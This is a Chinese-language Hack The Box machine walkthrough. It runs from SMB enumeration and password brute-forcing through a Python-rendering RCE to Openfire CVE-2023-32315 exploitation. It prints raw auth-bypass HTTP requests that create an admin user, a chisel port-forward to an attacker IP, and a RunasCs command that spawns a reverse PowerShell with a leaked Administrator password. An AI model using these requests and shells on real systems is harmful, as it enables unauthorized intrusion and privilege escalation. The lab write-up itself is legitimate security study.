现在hosts中添加

然后使用nmap进行扫描

开了smb服务和http,访问网页

一个倒计时网页,没啥用

回头看看smb服务能不能免密访问

可以空密码登录,并且有两个共享文件夹,查看文件夹内容

发现有几个文件夹,还有表格,先下载下来

发现了账号和密码,先记下来,在对网页进行信息收集

没有多余的网页,也没后台,感觉有问题,重新扫描端口,看看是不是藏了大端口,我最开始的nmap扫描只能扫描常见端口

猜想是对的,确实藏了一个端口(因为最开始我们在表格中获取到了passwd,肯定可以用得到),访问的时候会显示出错,需要把这个也加进hosts中

发现登录页面

结合最开始的那个表格,进行爆破,即可爆破出账号和密码

发现三个长度不一样的,尝试登录看看

第三个可以登录

试了一下全部报错沟八用没有,看样子只能找漏洞了

有洞!!!!!

这个漏洞的大概意思就是可以将html的代码自动识别到系统的python中进行运行,从而获得RCE,下面进行具体操作

shell编写

获得权限

获得user

下面肯定就是提权了,查看端口,发现开了两个端口,但是我们现在没办法访问,得代理到本地靶机中

使用chisel就可以

https://github.com/jpillora/chisel

先将Windows版本的文件通过python传到靶机中

然后使用

./chisel.exe client 10.10.14.15:1132 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091

之后再本地再接收这个端口(kali可以直接下载chisel)

然后浏览器访问即可

然后查了一下openfile的版本,存在CMS漏洞

https://github.com/miko550/CVE-2023-32315

可以直接绕过新建一个用户登录

也可以使用msf(更简单)

lhost改成你HTB的代理ip.10.10.14.xx

直接run,即可拿到shell,拿到之后,去查看数据库信息,找到admin的密码,"becb0c67cfec2..........."

然后使用工具进行解密,java工具

https://github.com/c0rdis/openfire_decrypt

如果你已经到这一步,那就可以不用看下面的了,直接跳到得到admin密码直接登录的地方

或者直接手动复现这个漏洞

1.

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp HTTP/1.1 Host: your-ip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

2.

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=I5Mh5Zl1DK2qBGT&username=test123&name=&email=&password=test123&passwordConfirm=test123&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7 HTTP/1.1 Host: your-ip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: JSESSIONID=node01q1zp5igpjjwd1fd25m8atvtmz12.node0; csrf=I5Mh5Zl1DK2qBGT Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

通过1获取到cookie

再通过第二个包发送payload出现报错即可

然后去登录,账号密码test123

然后上传插件进行命令执行(我把这个插件放到云里,供大家下载)

org.jivesoftware.openfire.plugin.CVE-openfire-plugin-assembly.jar

上传插件

使用插件

在openfire系统的源文件目录C:\Program Files\Openfire\embedded-db里面可以找到openfire,script,将其下载下来

其实最终目的就是要得到这个文件,我上面说的MSF打进去更方便,所以算是两种方法了.

拿到之后使用工具解密

然后CS上线

上线之后

传一个RunasCS .\RunasCS.exe Administrator ThisPasswordShouldDo!@ powershell -r 10.10.14.15:1234

上一个监听

总体来说不难,没找到相关资料,摸爬滚打的过来,中间有不懂的可以评论,我有时间就回

日常分享
最后更新于 2024-09-23